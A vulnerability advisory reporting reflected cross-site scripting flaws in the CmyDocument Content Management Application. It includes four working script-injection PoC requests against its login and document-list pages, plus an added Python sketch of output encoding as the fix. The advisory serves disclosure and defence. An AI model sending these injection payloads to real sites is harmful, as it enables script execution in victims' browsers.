CmyDocument Content Management Application XSS Vulnerabilities

Summary

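CmyDocument Content Management Application is prone to cross-site scripting (XSS) vulnerabilities in the username parameter of login.asp and login2.asp and in the x_Revised parameter of myDoclist.asp and myWebDoclist.asp.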

Credit:

The information has been provided by demonalex.


Details

Vulnerable Systems:
 * CmyDocument Content Management Application version update: 2010-01-10

Proof of Concept:
1) username in login.asp, PoC:
POST http://192.168.10.202/login.asp
------------
username='><script>alert('demonalex')</script>&password=bbb&rememberme=a&submit=+++Login+++

2) username in login2.asp, PoC:
POST http://192.168.10.202/login2.asp
------------
username='><script>alert('demonalex')</script>&password=bbb&rememberme=a&submit=+++Login+++

3) x_Revised in myDoclist.asp, PoC:
http://192.168.10.202/myDoclist.asp?x_Title=a&z_Title=LIKE&x_Revised=<SCRIPT>alert('demonalex');</SCRIPT>&z_Revised==&x_KeyWords=info&z_KeyWords=LIKE&x_owner=a&z_owner=LIKE

4) x_Revised in myWebDoclist.asp, PoC:
http://192.168.10.202/myWebDoclist.asp?x_Title=b&z_Title=LIKE&x_Revised=<SCRIPT>alert('demonalex');</SCRIPT>&z_Revised==&x_KeyWords=test&z_KeyWords=LIKE&x_owner=a&z_owner=LIKE
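
Mitigation example (added here, not part of the original advisory and not the application's code): the Python sketch below reflects the PoC 1 and PoC 3 values with and without HTML output encoding. The two templates are assumptions inferred from the payload shapes, since the advisory does not show the application's markup; all function names are hypothetical.

```python
import html
from urllib.parse import unquote_plus

# Hypothetical markup: the advisory does not show the application's templates.
# The "'>" prefix in PoCs 1-2 suggests a single-quoted attribute context;
# the bare <SCRIPT> in PoCs 3-4 suggests an element-body context.
ATTR_TEMPLATE = "<input type='text' name='username' value='{}'>"
BODY_TEMPLATE = "<td>Revised: {}</td>"

# Request data from PoC 1 and PoC 3 of the advisory, with ASCII single quotes.
LOGIN_BODY = ("username='><script>alert('demonalex')</script>"
              "&password=bbb&rememberme=a&submit=+++Login+++")
DOCLIST_QUERY = ("x_Title=a&z_Title=LIKE"
                 "&x_Revised=<SCRIPT>alert('demonalex');</SCRIPT>&z_Revised=="
                 "&x_KeyWords=info&z_KeyWords=LIKE&x_owner=a&z_owner=LIKE")


def parse_form(data: str) -> dict:
    """Split on '&' only, so the ';' inside the PoC value is kept intact."""
    fields = {}
    for pair in data.split("&"):
        name, _, value = pair.partition("=")
        fields[unquote_plus(name)] = unquote_plus(value)
    return fields


def render_unsafe(template: str, value: str) -> str:
    """Reflect the request value verbatim, the behaviour the PoCs rely on."""
    return template.format(value)


def render_encoded(template: str, value: str) -> str:
    """HTML-encode & < > " ' before reflecting. quote=True is required for the
    attribute case; otherwise the single quote still closes value='...'."""
    return template.format(html.escape(value, quote=True))


def is_inert(markup: str) -> bool:
    """Demo-only check: no literal <script tag and no early-closed attribute."""
    return "<script" not in markup.lower() and "value=''>" not in markup


def demo() -> dict:
    username = parse_form(LOGIN_BODY)["username"]
    revised = parse_form(DOCLIST_QUERY)["x_Revised"]
    return {
        "attr_unsafe": is_inert(render_unsafe(ATTR_TEMPLATE, username)),
        "attr_encoded": is_inert(render_encoded(ATTR_TEMPLATE, username)),
        "body_unsafe": is_inert(render_unsafe(BODY_TEMPLATE, revised)),
        "body_encoded": is_inert(render_encoded(BODY_TEMPLATE, revised)),
    }
```

In the application's own classic ASP pages, the equivalent step is passing each reflected value through Server.HTMLEncode before writing it to the response.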

Disclosure Timeline:
Vulnerability Published : 2011-07-11
